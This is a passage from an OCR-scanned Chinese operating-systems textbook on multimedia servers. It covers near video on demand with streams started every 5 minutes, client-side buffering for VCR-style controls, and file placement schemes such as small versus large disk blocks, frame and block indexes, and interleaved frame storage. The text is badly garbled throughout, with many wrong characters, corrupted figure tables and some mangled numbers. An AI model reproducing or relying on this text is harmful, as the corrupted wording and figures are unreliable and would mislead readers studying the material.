们 无 法 共享 一 个 数据 流 。 使 优化 成 为 可 能 的 修改 是 ， 通 知 所 有 用 户 电 影 
只 在 整 点 和 随后 每 隔 (例如)〉 5 分 钟 开 始 。 因 此 ， 如 果 一 个 用 户 想 在 
8:02 看 一 部 电影 ， 那 么 他 必须 等 到 8:05。 











这 样 做 的 收益 是 ， 不 管 存在 多 少 客户 ， 对 于 一 部 2 小 时 的 电影 ， 只 
需要 24 个 数据 流 。 如 图 7-17 所 示 ， 第 一 个 数据 流 开始 于 8:00。 在 8:05， 
当 第 一 个 数据 流 处 于 第 9000 帧 时 ， 第 二 个 数据 流 开 始 。 在 8:10， 当 第 一 
个 数据 流 处 于 第 18 000 帧 并 且 第 二 个 数据 流 处 于 第 9000 帧 时 ， 第 三 个 数 
据 流 开始 ， 以 此 类 推 直到 第 24 个 数据 流 开始 于 9:55。 在 10:00， 第 一 个 数 
据 流 终 止 并 且 再 一 次 从 第 0 帧 开始 。 这 一 方案 称 为 近似 视频 点 播 (near 
video on demand) ， 因 为 视频 并 不 是 完全 随 着 点 播 而 开始 ， 而 是 在 点 播 
之 后 不 从 到 崔 : 





数据 流 
Co ] [8ooo] [18000] [27000] [36000] [45000] [54000] [63000] [72000] [81000 


2 Co ] [2000] [18000] [27000] [86000] [45000] [54000] [63000] [72000 
3 Co ] [9000] [18000] [27000] [36000] [45000] [54000] [63000 
4 Co ] [9000] [18000] [27000] [36000] [45000] [54000] 
5 a [Co ] [9000] [18000] [27000] [36000] [45000] 
h 第 3 个 数据 流 中 

的 第 9000 帧 在 Lo] 36000 
7 8:20 送 出 Co ] [sooo] [18000] [27000 
8 Co ] [9000] [18000 
9 Co] [000] 
10 Co] 


8:00 8:05 8:10 8:15 8:20 8:25 8:30 8:35 8:40 8:45 
时 间 一 > 


图 7-17 近似 视频 点 播 以 规则 的 间隔 开始 一 个 新 的 数据 流 ， 在 本 例 中 
时 间 间 隔 为 5 分 钟 (9000 Hi ) 





这 里 的 关键 参数 是 多 长 时 间 开 始 一 个 数据 流 。 如 果 每 2 分 钟 开始 一 
个 数据 流 ， 那 么 对 于 一 部 2 小 时 的 电影 来 说 就 需要 60 个 数据 流 ， 但 是 开 
台 观 看 的 最 大 等 待 时 间 是 2 分 钟 。 运 营 商 必须 判定 人 们 愿意 等 竺 多 长 时 
间 ， 因 为 人 们 愿意 等 竺 的 时 间 越 长 ， 系 统 效率 就 越 高 ， 并 且 同 时 能 够 被 
观看 的 电影 就 越 多 。 一 个 丛 代 的 策略 是 同时 提供 不 用 等 竺 的 选择 权 ， 在 
这 种 情况 下 ， 新 的 数据 流 可 以 立刻 开始 ， 但 是 需要 对 系统 做 更 多 的 修改 
以 文 持 即 时 局 动 。 





在 茶 种 意义 上 ， 视 频 操 播 如 同 使 用 出 租车 : 一 招手 它 就 来 。 近 似 视 
频 点 播 如 同 使 用 公共 汽车 : 它 有 着 固定 的 时 刻 表 ， 乘 客 必 须 等 得 下 一 
辆 。 但 是 大 众 交 通 只 有 在 存在 大 众 的 时 候 才 有 意义 。 在 曼哈顿 中 心 区 ， 
每 5 分 钟 一 辆 的 公共 汽车 加 起 来 至 少 还 可 以 拉 上 一 些 乘 客 ， 而 在 怀俄明 
州 乡间 公路 上 旅行 的 公共 汽车 ， 可 能 在 所 有 的 时 间 几 乎 都 是 空空 的 。 类 
似 地 ， 播 放 史 送 文 " 斯 诡 尔 们 格 的 最 新 大 片 可 能 吸引 足够 多 的 客户 ， 从 
而 保证 每 5 分 钟 开 始 一 个 新 的 数据 流 ， 但 是 对 于 《乱世 佳人 》 这 样 的 经 
典 影 片 ， 最 好 还 是 简单 地 在 点 播 的 基础 上 播映 。 





对 于 近似 视频 点 播 ， 用 户 不 具有 VCR 控 制 能 力 。 没 有 用 户 能 够 暂停 
部 电影 而 去 一 趟 厨房 。 他 们 所 能 做 的 最 好 的 事情 不 过 是 当 他 们 从 厨房 
中 返回 时 ， 同 后 退 到 随后 开始 的 一 个 数据 流 ， 从 而 使 漏 过 的 几 分 钟 资料 
重 现 。 











实际 上 ， 近 似 视频 点 播 还 有 另外 一 个 模型 。 在 这 个 模型 中 ， 人 们 可 
以 在 他 们 需要 的 任意 时 候 预 订 电 影 ， 而 不 是 预先 宣布 每 隔 5 分 钟 将 开演 
某 部 电影 。 每 隔 5 分 钟 ， 系 统 要 查看 哪些 电影 已 经 被 预订 并 且 开 始 这 些 
电影 。 采 用 这 一 方案 时 ， 根 据点 播 的 情况 ， 一 部 电影 可 能 在 8:00、 
8:10、8:15 和 8:25 开 始 ， 但 不 会 在 中 间 的 时 间 开 始 。 结 果 ， 没 有 观众 的 
数据 流 就 不 会 被 传输 ， 节 约 了 磁盘 带宽 、 内 存 和 网 络 容量 。 另 一 方面 ， 
现在 到 厨房 去 制作 冰淇淋 就 有 点 冒险 ， 因 为 不 能 保证 在 观众 正在 观看 的 
电影 之 后 5 分 钟 还 有 男 一 个 数据 流 正 在 运行 。 当 然 ， 运 营 商 可 以 给 用 户 




















提供 一 个 选项 ， 以 便 显 示 所 有 同时 发 生 的 数据 流 的 一 个 列表 ， 但 是 大 多 
数 人 觉得 他 们 的 电视 机 和 遥控 器 按钮 已 经 太 多 ， 不 大 可 能 会 热情 地 欢迎 更 
多 的 几 个 按钮 。 


7.6.3 ”具有 VCR 功 能 的 近似 视频 点 播 


将 近似 视频 点 播 〈 为 的 是 效率 ) 加 上 每 个 个 体 观 众 完全 的 VCR 控 制 
(为 的 是 方便 用 户 ) 是 一 种 理想 的 组 合 。 通 过 对 模型 进行 略微 的 修正 ， 
这 样 的 设计 是 有 可 能 的 。 下 面 我 们 将 介绍 为 达到 这 一 目标 所 采用 的 一 种 
方法 〈Abram-Profeta 和 Shin,1998) ， 我 们 给 出 的 是 略微 简化 了 的 描述 。 


我 们 将 以 图 7-17 所 示 的 标准 近似 视频 点 播 模 式 为 开端 。 可 是 ， 我 们 
要 增加 要 求 ， 即 要 求 每 个 客户 机 在 本 地 缓冲 前 AT 分 钟 以 及 即将 来 临 的 
AI 分 钟 。 绥 冲 前 AI 分 钟 是 十 分 容易 的 : 只 要 在 显示 之 后 将 其 保存 下 来 
即 可 。 绥 冲 即将 来 临 的 AT 分 钟 是 比较 困难 的 ， 但 是 如 果 客 户 机 有 一 次 
读 两 个 数据 流 的 能 力也 是 可 以 实现 的 。 





可 以 用 一 个 例子 来 说 明 建立 缓冲 区 的 一 种 方法 。 如 果 一 个 用 户 在 
8:15 开 始 观看 电影 ， 那 么 客户 机 读 入 并 显示 8:15 的 数据 流 该 数据 流 正 
处 于 第 0 帧 )。 与 此 并 行 ， 客 户 机 读 入 并 保存 8:10 的 数据 流 ， 该 数据 流 
当前 正 处 于 5 分 钟 的 标记 处 (也 就 是 第 9000 帧 )。 在 8:20 时 ， 第 0 帧 至 第 
17 999 帧 已 经 被 保存 下 来 ， 并 且 用 户 下 面 将 要 看 到 的 应 该 是 第 9000 帧 。 
从 此 刻 开 始 ，8:15 的 数据 流 被 放弃 ， 缓 冲 区 用 8:10 的 数据 流 〈 该 数据 流 
正 处 于 第 18 000 帧 )》 来 填充 ， 而 显示 则 从 缓冲 区 的 中 间 点 《第 9000 帧 ) 
驱动 。 当 每 一 新 的 帧 被 读 入 时 ， 在 缓冲 区 的 终点 处 添加 一 帧 ， 而 在 缓冲 





区 的 起 点 处 丢弃 一 帧 。 当 前 被 显示 的 帧 称 为 播放 点 (play point) ， 它 总 
是 处 于 缓冲 区 的 中 间 点 。 图 7-18a 所 示 为 电影 播放 到 第 75 分 钟 时 的 情 
形 。 此 时 ，70 分 钟 到 80 分 钟 之 间 所 有 的 帧 都 在 缓冲 区 中 。 如 果 数 据 率 是 
4Mbps， 则 10 分 钟 的 缓冲 区 需要 300M 字 节 的 存储 容量 。 以 目前 的 价 
格 ， 这 样 的 缓冲 区 肯定 可 以 在 磁盘 中 保持 ， 并 且 在 RAM 中 保持 也 是 可 
能 的 。 如 果 和 希望 使 用 RAM， 但 是 300M 字 节 又 太 大 ， 那 么 可 以 使 用 小 一 
些 的 绥 冲 区 。 





播放 点 在 第 75 分 钟 


播放 点 在 第 12 分 钟 


> A 


播放 点 在 第 15 分 钟 


a | ER 


播放 点 在 第 16 分 钟 


| 


p 播放 点 在 第 22 分 钟 
CD 
图 7-18 人 初始 情形 ; b) 倒 带 至 12 分 钟 之 后 ; go 等 待 3 分 钟 之 后 ; 中 开始 


重 填充 缓冲 区 之 后 ; 日 缓冲 区 满 


现在 假设 用 户 决 定 要 快 进 或 者 快 倒 。 只 要 播放 点 保持 在 70 到 80 分 钟 
的 范围 之 内 ， 显 示 束 可 以 从 缓冲 区 馈 入 。 然 而 ， 如 果 播 放 扣 在 条 个 方 问 
离开 了 这 一 区 间 ， 我 们 就 遇 到 了 问题 。 解 决 方法 是 开启 一 个 私有 “也 束 
是 视频 点 播 ) 数 据 流 以 服务 于 用 户 。 沿 着 某 个 方向 快速 运动 可 以 用 前 面 
讨论 过 的 技术 来 处 理 。 


通常 ， 在 东 一 时 刻 用 户 可 能 会 安 下 心 来 决定 再 次 以 正常 速度 观看 电 
影 。 此 时 ， 我 们 可 以 考虑 将 用 户 迁 移 到 某 一 近似 视频 点 播 数据 流 ， 这 样 
私有 数据 流 就 可 以 被 放 痉 。 例 如 ， 假 设 用 户 决定 返回 到 12 分 钟 标 号 处 ， 
如 图 7-18b 所 示 。 这 一 扣 远 远 超 出 了 绥 冲 区 的 范围 ， 所 以 显示 不 可 能 从 
缓冲 区 馈 入 。 此 外 ， 由 于 切换 (立刻 ) 发 生 在 第 75 分 钟 ， 系 统 中 存在 着 
正在 显示 电影 第 5、10、15 和 20 分 钟 那 一 帧 的 数据 流 ， 但 是 没有 显示 电 
影 第 12 分 钟 那 一 帧 的 数据 流 。 








解决 方法 是 继续 观看 私有 数据 流 ， 但 是 开始 从 当前 正 播放 电影 第 15 
分 钟 那 一 帧 的 数据 流 填充 缓冲 区 。 经 过 3 分 钟 之 后 的 情形 如 图 7-18c 所 
示 。 播 放 点 现在 是 第 15 分 钟 ， 绥 冲 区 包含 了 15 到 18 分 钟 的 帧 ， 而 近似 视 
频 点 播 数 据 流 正 处 在 第 8、13、18 和 23 分 钟 。 在 这 一 时 刻 ， 私 有 数据 流 
可 以 被 放弃 ， 显 示 可 以 从 缓冲 区 馈 入 。 组 冲 区 继续 从 现在 正 处 于 第 18 分 
钟 的 数据 流 填充 。 经 过 另 一 分 钟 之 后 ， 播 放 点 是 第 16 分 钟 ， 缓 冲 区 包 侣 
了 15 到 19 分 钟 的 帧 ， 并 且 数 据 流 在 第 19 分 钟 处 将 数据 馈 入 缓冲 区 ， 如 图 
7-18d 所 示 。 


经 过 力 外 6 分 钟 之 后 ， 绥 冲 区 变 满 ， 并 且 播 放 点 是 在 第 22 分 钟 。 播 
放 扣 不 是 处 于 缓冲 区 的 中 间 点 ， 但 是 如 果 必 要 可 以 进行 这 样 的 整理 。 


7.7 文件 存放 


多 媒体 文件 非常 庞大 ， 通 利 只 写 一 次 而 读 许 多 次 ， 并 且 倾 问 于 被 顺 
序 访问 。 乞 们 的 回放 还 必须 满足 严格 的 服务 质量 标准 。 总 而 言 之 ， 这 些 
要 求 暗 示 着 不 同 于 传统 操作 系统 使 用 的 文件 系统 布局 。 我 们 在 下 面 将 讨 
论 茶 些 这 样 的 问题 ， 首 先 针 对 单个 磁盘 ， 然 后 是 多 个 磁盘 。 








7.7.1 在 单个 磁盘 上 存放 文件 





最 为 重要 的 要 求 是 数据 能 够 以 必要 的 速度 流出 到 网 络 或 输出 设备 
上 上 ， 并 且 没 有 颤动 。 为 此 ， 在 传输 一 帧 的 过 程 中 有 多 次 寻 道 是 极度 不 受 
欢迎 的 。 在 视频 服务 顺 上 消除 文件 内 寻 道 的 一 种 方法 是 使 用 连续 的 文 
件 。 通 党 ， 使 文件 为 连续 的 工作 做 得 并 不 十 分 好 ， 但 是 在 预先 精心 装载 
了 电影 的 视频 服务 器 上 它 工 作 得 还 是 不 错 的 ， 因 为 这 些 电 影 后 来 不 会 再 
发 生变 化 。 











然而 ， 视 频 、 音 频 和 文本 的 存在 是 一 个 复杂 因素 ， 如 图 7-3 所 示 。 
即使 视频 、 音 频 和 文本 每 个 都 存储 为 单独 的 连续 文件 ， 从 视频 文件 到 音 
频 文件 ， 再 从 音频 文件 到 文本 文件 的 寻 道 在 需要 的 时 候 还 是 免不了 的 。 
这 使 人 想起 第 二 种 可 能 的 存储 排列 ， 使 视频 、 音 频 和 文本 交叉 存放 ， 但 
是 整个 文件 还 是 连续 的 ， 如 图 7-19 所 示 。 此 处 ， 直 接 跟 随 第 1 帧 视频 的 


是 第 1 帧 的 各 种 音频 轨迹 ， 人 然后 是 第 1 帧 的 各 种 文本 轨迹 。 根 据 存 在 多 少 
首 频 和 文本 轨迹 ， 最 简单 的 可 能 是 在 一 次 磁盘 读 操 作 中 读 入 每 一 帧 的 全 
部 内 容 ， 然 后 只 将 需要 的 部 分 传输 给 用 户 。 





第 1 帧 第 2 帧 第 3 帧 





ws jajaja p wn [aala a ww [alata laa 
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图 7-19 每 部 电影 在 一 个 连续 文件 中 交叉 存放 视频 、 音 频 和 文本 








这 一 组 织 需 要 额外 的 磁盘 IO 读 入 不 必要 的 音频 和 文本 ， 在 内 存 中 

还 需要 额外 的 缓冲 区 空间 存放 它们 。 可 是 它 消 除了 所 有 的 寻 道 〈 在 单 用 
户 系 统 上 ) ， 并 且 不 需要 任何 系统 开销 跟踪 哪 一 帧 在 磁盘 上 的 什么 地 
方 ， 因 为 整 部 电影 存放 在 一 个 连续 文件 中 。 以 这 样 的 布局 ， 随 机 访问 是 
不 可 能 的 ， 但 是 如 果 不 需 要 随机 访问 ， 这 点 损失 并 不 严重 。 类 似 地 ， 如 
果 没 有 额外 的 数据 结构 和 复杂 性 ， 快 进 和 快 倒 也 是 不 可 能 的 。 





在 具有 多 个 并 发 输出 流 的 视频 服务 器 上 ， 使 整 部 电影 成 为 一 个 连续 
文件 的 优点 就 失去 了 ， 因 为 从 一 部 电影 读 取 一 帧 之 后 ， 磁 盘 可 能 不 得 不 
从 许多 其 他 电影 读 入 帧 ， 然 后 才能 返回 到 第 一 部 电影 。 同 样 ， 对 于 一 部 
电影 既 可 以 读 也 可 以 写 的 系统 “例如 用 于 视频 生产 或 编辑 的 系统 ) 来 
说 ， 使 用 巨大 的 连续 文件 是 很 困难 的 ， 因 而 也 是 没有 用 的 。 
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这 些 考虑 导致 两 个 针对 多 媒体 文件 的 其 他 文件 存放 组 织 。 第 一 个 是 
小 块 模型 ， 如 图 7-20a 所 示 。 在 这 种 组 织 中 ， 选 定 磁盘 块 的 大 小 比 帧 的 
平均 大 小 ， 甚 至 是 比 P 帧 和 B 帧 的 大 小 ， 要 小 得 多 。 对 于 每 秒 30 帧 以 4 
Mbps 速 率 传 输 的 MPEG-2 而 言 ， 帧 的 平均 大 小 为 16KB， 所 以 一 个 磁盘 
块 的 大 小 为 1KB 或 2KB 工 作 得 比较 好 。 这 里 的 思想 是 每 部 电影 有 一 个 帧 
索引 ， 这 是 一 个 数据 结构 ， 每 一 帧 有 一 个 帧 索引 项 ， 指 向 帧 的 开始 。 每 
一 帧 本 身 是 一 连 串 连续 的 块 ， 包 含 该 帧 所 有 的 视频 、 音 频 和 文本 轨迹 ， 
如 图 7-20 中 所 示 。 这 样 ， 读 第 k 帧 时 首先 要 在 帧 索引 中 找到 第 k 个 索引 
项 ， 然 后 在 一 次 磁盘 操作 中 将 整个 帧 读 入 。 由 于 不 同 的 帧 具有 不 同 的 大 
小 ， 所 以 在 帧 索引 中 需要 有 表示 帧 大 小 的 字段 〈 以 块 为 单位 ) ， 即 便 对 
于 1KB 大 小 的 磁盘 块 ，8 位 的 字段 也 可 以 处 理 最 大 为 255KB 的 帧 ， 这 对 
于 一 个 未 压缩 NTSC 帧 来 说 ， 就 算 它 有 许多 音频 轨迹 也 已 经 足够 了 。 























存放 电影 的 另 一 个 方法 是 使 用 大 磁盘 块 〈 比 如 256KB) ， 并 且 在 每 
一 块 中 放 入 多 个 帧 ， 如 图 7-20b 所 示 。 这 里 仍然 需要 一 个 索引 ， 但 是 这 
次 不 是 帧 索引 而 是 块 索引 。 实 际 上 ， 该 索引 与 图 6-15 中 的 i 节 点 基本 相 
司 ， 只 是 可 能 还 有 额外 的 信息 表明 哪 一 帧 处 于 每 一 块 的 开始 ， 这 样 就 有 
可 能 快速 地 找到 指定 的 帧 。 一 般 而 言 ， 一 个 磁盘 块 拥有 的 帧 的 数目 不 见 
得 是 整数 ， 所 以 需要 做 某 些 机 制 来 处 理 这 一 问题 。 解 决 这 一 问题 有 两 种 
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图 7-20 不 连续 的 电影 存储 : 引 小 磁盘 块 ; b) 大 磁盘 块 





一 种 选择 如 图 7-20b 所 示 ， 当 下 一 帧 填 不 满 当 前 磁盘 块 的 时 候 ， 
则 磁盘 块 剩余 的 部 分 就 保持 空间 状态 。 这 一 浪费 的 空间 就 是 内 部 人 雄 片 ， 
与 具有 固定 大 小 页 面 的 虚拟 内 存 系 统 中 的 内 部 碎片 相同 。 但 是 ， 这 样 做 
在 一 帧 的 中 间 决 不 需要 进行 寻 道 











妨 一 种 选择 是 填充 每 一 磁盘 块 到 尽头 ， 将 帧 分 裂 开 使 其 跨越 磁盘 
块 。 这 一 选择 在 帧 的 中 间 引 入 寻 道 的 需要 ， 这 将 损害 性 能 ， 但 是 由 于 消 
除了 内 部 雁 片 而 节约 了 磁盘 空间 。 





作为 对 比 ， 图 7-20a 中 小 块 的 使 用 也 会 痕 费 茶 些 磁盘 空间 ， 因 为 在 


等 一 帧 的 最 后 一 块 可 能 有 一 小 部 分 未 被 使 用 。 对 于 1KB 的 磁盘 块 和 一 部 
由 216 000 帧 组 成 的 2 小 时 的 NTSC 电 影 ， 良 费 的 磁盘 空间 总 共 只 有 3.6GB 
中 的 大 约 108KB。 图 7-20b 浪 费 的 磁盘 空间 计算 起 来 非常 困难 ， 但 是 

定 多 很 多 ， 因 为 在 一 个 磁盘 块 的 尽头 有 时 会 留 下 100KB 的 空间 ， 而 下 一 
帧 是 一 个 比 它 大 的 I 帧 。 





另 一 方面 ， 块 索引 比 帧 索引 要 小 很 多 。 对 于 256KB 的 块 ， 如 果 帧 的 
平均 大 小 为 16KB， 那 么 一 个 块 大约 可 以 装 下 16 个 帧 ， 所 以 一 部 由 216 
000 帧 组 成 的 电影 在 块 索 引 中 只 需要 有 13 500 个 索引 项 ， 与 此 相对 比 ， 

对 于 帧 索引 则 需要 216 000 个 索引 项 。 因 为 性 能 的 原因 ， 在 这 两 种 情形 

中 索引 都 应 该 列 出 所 有 的 帧 或 磁盘 块 〈 也 就 是 说 不 像 UNIX 那 样 有 间接 
块 ) ， 所 以 块 索引 在 内 存 中 占用 了 13 500 个 8 字 节 的 项 (4 个 字 节 用 于 磁 
盘 地 址 ，1 个 字 节 用 于 帧 的 大 小 ，3 个 字 节 用 于 起 始 帧 的 帧 号 )》 ， 帧 索引 
则 在 内 存 中 占用 了 216 000 个 5 字 节 的 项 (只 有 磁盘 地 址 和 帧 的 大 小 〉， 

比较 起 来 ， 当 电影 在 播放 时 ， 块 索引 比 帧 索引 节省 了 接近 1MB 的 RAM 
SE 

















这 些 考虑 导出 了 如 下 的 权衡 : 
1) 帧 索引 : 电影 在 播放 时 使 用 大 量 的 RAM; 磁盘 浪 颖 小 。 


2) 块 索引 禁止 分 裂 帧 跨越 磁盘 块 ) : RAM 用 量 低 ， 磁 盘 浪 费 较 


3) 块 案 引 《人 允许 分 裂 帧 路 越 磁 盘 块 ) : RAM 用 量 低 ， TRI: 
再 要 额外 寻 道 。 


因此 ， 这 里 的 权衡 涉及 回放 时 RAM 的 使 用 量 、 自 始 至 终 浪 费 的 破 
盘 空 间 以 及 由 于 额外 寻 道 造成 的 回放 时 的 性 能 损失 。 但 是 ， 这 些 问题 可 
以 用 各 种 方法 来 解决 。 采 用 分 页 操作 在 需要 的 时 候 及 时 将 帧 罕 引 装 入 内 
存 ， 可 以 减少 RAM 的 使 用 量 。 通 过 足够 的 缓冲 可 以 屏蔽 在 帧 传输 过 程 
中 的 寻 道 ， 但 是 这 需要 额外 的 内 存 并 且 可 能 还 需要 额外 的 复制 操作 。 好 
的 设计 必须 仔细 分 析 所 有 这 些 因 素 ， 并 且 为 即将 投入 的 应 用 做 出 民 好 的 
选择 。 








这 里 的 男 一 个 因 系 是 图 7-20a 中 的 磁盘 存储 管理 更 加 复杂 ， 因 为 存 
放 一 帧 需要 找到 大 小 合适 的 一 连 串 连续 的 磁盘 块 。 理 想 情 况 下 ， 这 一 连 
中 磁盘 块 不 应 该 跨越 一 个 磁道 的 边界 ， 但 是 通过 磁头 偶 糙 ， 这 一 损失 并 
不 严重 。 然 而 ， 路 越 一 个 柱 面 的 边界 则 应 该 避免 。 这 些 要求 意 味 着 ， 破 
盘 的 自由 存储 空间 必须 组 织 成 变 长 孔洞 的 列表 ， 而 不 是 简单 的 块 列 表 或 
者 位 图 。 与 此 相对 照 ， 块 列表 或 者 位 图 都 可 以 用 在 图 7-20b 中 。 





在 上 述 所 有 情况 下 ， 还 要 说 明 的 是 ， 只 要 可 能 应 该 把 一 部 电影 的 所 
有 块 或 者 帧 放置 在 一 个 狭窄 的 范围 之 内 ， 比 如 谨 几 个 柱 面 。 这 样 的 存放 
方式 意味 痢 寻 道 可 以 更 快 ， 从 而 留 下 更 多 的 时 间 用 于 其 他 《 非 实 时 ) 活 
动 ， 或 者 可 以 支持 更 多 的 视频 流 。 这 种 受 约束 的 存放 可 以 通过 将 磁盘 划 
分 成 柱 面 组 来 实现 ， 每 个 组 保持 单独 的 空 帮 块 列表 或 位 图 。 如 果 使 用 筷 





洞 ， 可 能 存在 一 个 1KB 了 筷 洞 的 列表 、 一 个 2KB 了 和 孔洞 的 列表 、 一 个 3KB 到 
4KB 妃 洞 的 列表 、 一 个 5KB 到 8KB 妃 洞 的 列表 等 。 以 这 种 方法 在 一 个 给 
定 的 柱 面 组 中 找到 一 个 给 定 大 小 的 孔洞 是 十 分 容易 的 。 


这 两 种 方法 之 间 的 男 一 个 区 别 是 缓冲 。 对 于 小 块 方法 ， 每 次 读 操作 
正好 读 取 一 帧 。 因 此 ， 采 用 简单 的 双 绥 冲 策略 就 工作 得 相当 好 : 一 个 组 
冲 区 用 于 回放 当前 帧 ， 另 一 个 用 于 提取 下 一 帧 。 如 果 使 用 固定 大 小 的 组 
冲 区 ， 则 每 个 缓冲 区 必须 足够 大 以 装 得 下 最 大 可 能 的 I 帧 。 男 一 方面 ， 
如 果 针 对 每 一 帧 从 一 个 池 中 分 配 不 同 的 缓冲 区 ， 并 且 当 帧 在 被 读 入 之 前 
其 大 小 未 知 ， 那 么 对 于 P 帧 和 B 帧 束 可 以 选择 一 个 较 小 的 缓冲 区 。 


使 用 大 磁盘 块 时 ， 因 为 每 一 块 包含 多 个 帧 ， 并 且 在 每 一 块 的 尽头 还 
可 能 包含 帧 的 片段 (取决 于 选 定 前 面 提 到 的 古 哪 种 选择 ) ， 因 而 需要 更 
加 复 茶 的 策略 。 如 果 显 示 或 传输 帧 时 要 求 它 们 是 连续 的 ， 那 么 它们 就 必 
须 被 复制 ， 但 是 复制 是 一 个 代价 高 郧 的 操作 ， 应 该 尽 可 能 避免 。 如 果 连 
续 性 是 不 必要 的 ， 那 么 跨越 块 边界 的 帧 可 以 分 两 次 送出 到 网 络 上 或 者 送 
出 到 显示 设备 上 。 





双 绥 神 也 可 以 用 于 大 磁盘 块 ， 但 是 使 用 两 个 大 磁盘 块 会 浪费 内 存 。 
解决 浪费 内 存 问题 的 一 种 方法 是 使 用 比 为 网 络 或 显示 器 提供 数据 的 磁盘 
ER (每 个 数据 流 ) 和 大 一 些 的 循环 传输 缓冲 区 。 当 缓冲 区 的 内 容 低 于 茶 
个 闭 值 时 ， 从 磁盘 读 入 一 个 新 的 大 磁盘 块 ， 将 其 内 容 复制 到 传输 缓冲 
区 ， 并 且 将 大 磁盘 块 缓冲 区 返还 给 通用 季 。 循 环 缓冲 区 大 小 的 选取 必须 


使 得 在 它 达 到 冰 值 时 ， 还 有 空间 能 够 容纳 另 一 个 完整 的 磁盘 块 。 因 为 传 
和 输 缓冲 区 可 能 要 环比， 所 以 磁盘 该 操作 不 能 直接 达到 传输 缓冲 区 。 这 里 
复制 和 内 存 的 使 用 量 相 互 之 间 存 在 着 权衡 。 





在 比较 这 两 种 方法 时 ， 还 有 为 一 个 因 系 束 是 磁盘 性 能 。 使 用 大 磁盘 
块 时 磁盘 可 以 以 全 速 运转 ， 这 经 常 是 主要 关心 的 事情 。 作 为 单独 的 单位 
读 入 小 的 P 帧 和 B 帧 效率 是 比较 低 的 。 些 外， 将 大 磁盘 块 分 解 在 多 个 驱 
ae CREPE) 是 可 能 的 ， 而 将 单独 的 帧 分 解 在 多 个 驱动 器 上 是 








图 7-20a 的 小 块 组 织 有 时 称 为 恒定 时 间 长 度 〈constant time 
length) ， 因 为 索引 中 的 每 个 指针 代表 着 相同 的 播放 时 间 军 秒 数 。 相 
反 ， 图 7-20b 的 组 织 有 时 称 为 恒定 数据 长 度 〈constant data length) , [Al 
为 数据 块 的 大 小 相同 。 








两 种 文件 组 织 间 的 男 一 个 区 别 是， 如果 帧 的 类 型 存储 在 图 7-20a 的 
索引 中 ， 那 么 有 可 能 通过 仅仅 显示 I 帧 实现 快 进 。 然 而 ， 根 据 ! 帧 出 现在 
数据 流 中 的 频 度 ， 人 们 可 能 会 察觉 到 播放 的 速率 太 快 或 太 慢 。 在 任何 情 
况 下 ， 以 图 7-20b 的 组 织 ， 这 样 的 快 进 都 是 不 可 能 的 。 实 际 上 连续 地 读 
文件 以 选 出 硕 望 的 帧 需要 大 量 的 磁盘 IO。 





第 二 种 方法 是 使 用 一 个 特殊 的 文件 给 人 以 10 倍 速度 快 进 的 感觉 ， 而 
这 个 特殊 的 文件 是 以 正常 速度 播放 的 。 这 个 文件 可 以 用 与 其 他 文件 相同 


的 方法 构造 ， 可 以 使 用 帧 索引 也 可 以 使 用 块 案 引 。 打 开 一 个 文件 的 时 
候 ， 如 有 果 需 要 ， 系 统 必须 能 够 找到 快 进 文件 。 如 果 用 户 按 下 快 进 按钮 ， 
系统 必须 立即 找到 并 且 打 开 快 进 文件 ， 然 后 跳 到 文件 中 正确 的 地 方 。 系 
统 所 知道 的 是 当前 所 在 帧 的 帧 号 ， 但 是 它 所 需要 的 是 能 够 在 快 进 文件 中 
定位 到 相应 的 帧 。 如 果 系 统 当前 所 在 的 帧 号 是 4816， 并 且 知 道 快 进 文件 
是 10 倍 速 ， 那 么 它 必须 在 快 进 文件 中 定位 到 第 482 帧 并 且 从 那里 开始 播 
放 。 

如 果 使 用 了 帧 索引 ， 那 么 定位 一 个 特定 的 帧 是 十 分 容易 的 ， 只 要 检 
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的 工作 方式 与 快 进 相关 似 。 














7.7.3 近似 视频 点 播 的 文件 存放 





到 目前 为 止 我 们 已 经 了 解 了 视频 点 播 的 文件 存放 策略 。 对 于 近似 视 

频 点 播 ， 采 用 不 同 的 文件 存放 策略 可 以 获得 更 高 的 效率 。 我 们 还 记得 ， 

近似 视频 点 播 将 同一 部 电影 作为 多 个 交错 的 数据 流 送出 。 即 使 电影 是 作 
为 连续 文件 存放 的 ， 每 个 数据 流 也 需要 进行 寻 道 。Chen 和 
Thapar (1997) 设计 了 一 种 文件 存放 策略 几乎 可 以 消除 全 部 这 样 的 寻 
道 。 图 7-21 说 明了 这 一 方法 的 应 用 ， 图 7-21 中 的 电影 以 每 秒 30 帧 的 速率 
播放 ， 每 隔 5 分 钟 开始 一 个 新 的 数据 流 《〈 参 见 图 7-17) 。 根 据 这 些 参 
数 ，2 小 时 长 的 电影 需要 24 个 当前 数据 流 。 
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图 7-21 针对 近似 视频 点 播 的 优化 帧 存放 策略 





在 这 一 存放 策略 中 ， 由 24 个 帧 组 成 的 帧 集合 连 成 一 串 并 且 作为 一 个 


记录 写 入 磁盘 。 它 们 还 可 以 在 一 个 读 操作 中 被 读 回 。 考 虑 这 样 一 个 瞬 
间 ， 数 据 流 24 恰 好 开始 ， 它 需要 的 是 第 0 帧 ，5 分 钟 前 开始 的 数据 流 23 需 
要 的 是 第 9000 帧 ， 数 据 流 22 需 要 的 是 第 18 000 帧 ， 以 此 类 推 ， 直 到 数据 
流 0， 它 需要 的 是 第 20 700 帧 。 通 过 将 这 些 帧 连续 地 存放 在 一 个 磁道 
上 ， 视 频 服务 器 只 用 一 次 寻 道 《到 第 0 帧 ) 就 可 以 以 相反 的 顺序 满足 全 
部 24 个 数据 流 的 需要 。 当 然 ， 如 果 存 在 茶 一 原因 要 以 升序 为 数据 流 提供 
服务 ， 这 些 帧 也 可 以 以 相反 的 顺序 存放 在 磁盘 上 。 完 成 对 最 后 一 个 数据 
流 的 服务 之 后 ， 磁 盘 臂 可 以 移 到 磁道 2 准备 再 次 为 这 些 数 据 流 服务 。 这 
一 方法 不 要 求 整个 文件 是 连续 的 ， 但 是 对 于 知 干 个 同时 的 数据 流 仍然 给 
子 了 民 好 的 性 能 。 








简单 的 缓冲 朱 略 是 使 用 双 绥 冲 。 当 一 个 缓冲 区 正在 癌 外 播放 24 个 数 
气流 的 时 候 ， 男 一 个 缓冲 区 正在 预先 加 载 数 据 。 当 前 操作 结束 时 ， 两 个 
绥 冲 区 进行 交换 ， 刚 才 用 于 回放 的 缓冲 区 现在 在 一 个 磁盘 操作 中 加 载 数 
据 。 


一 个 有 趣 的 问题 是 构造 多 大 的 缓冲 区 。 显 然 ， 它 必须 能 够 逆 下 24 个 
帧 。 然 而 ， 由 于 帧 的 长 度 古 变化 的 ， 选 取 正 确 大 小 的 缓冲 区 并 不 完全 是 
